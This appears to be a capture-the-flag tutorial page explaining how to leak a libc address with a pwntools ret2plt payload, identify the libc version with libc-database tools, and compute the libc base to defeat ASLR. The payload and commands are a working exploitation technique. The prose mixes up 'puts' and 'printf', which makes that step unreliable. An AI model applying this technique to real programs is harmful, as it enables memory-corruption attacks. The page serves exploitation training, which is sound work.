Leaking LibC
ASLR bypass
If the ASLR is enable, an address of a libc function will be leak in order to know the address of the others libc functions.
Leaking Libc function address
In order to obtain an address, the ret2plt attack can be used :
from pwn import *
elf = ELF('./chall')
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
Here the process will print the address of the puts
function.
Finding LIBC library
To determine which version of the libc library is being used by the program, it is necessary to find which library version contains the 'puts' function at the given address.
This can be done by searching through the available library versions and comparing the addresses of the 'printf' function. Once the library version that contains the 'printf' function at the given address is found, it can be determined that this is the version of libc being used by the program.
Fortunately, several databases and tools are available to make this process easier such as "Libc database search engine" or "libc database"
$ ./find puts 0xf7d5f460
ubuntu-old-glibc (libc6_2.26-0ubuntu2.1_amd64)
ubuntu-old-glibc (libc6_2.26-0ubuntu2_amd64)
debian-glibc (libc6_2.31-13+deb11u5_i386)
ubuntu-old-eglibc (libc6-i386_2.13-20ubuntu5_amd64)
$ ./download libc6_2.26-0ubuntu2.1_amd64
Getting libc6_2.26-0ubuntu2.1_amd64
-> Location: http://old-releases.ubuntu.com/ubuntu/pool/main/g/glibc//libc6_2.26-0ubuntu2.1_amd64.deb
-> Downloading package
-> Extracting package
-> Package saved to libs/libc6_2.26-0ubuntu2.1_amd64
Getting libc base address
libc = ELF("libs/libc6_2.26-0ubuntu2.1_amd64")
libc.address = leak - libc.symbols[func_name] #Save libc base
log.success("LIBC base @ %s" % hex(libc.address))
[+] LIBC base: 0xf7d70000
Resources
Last updated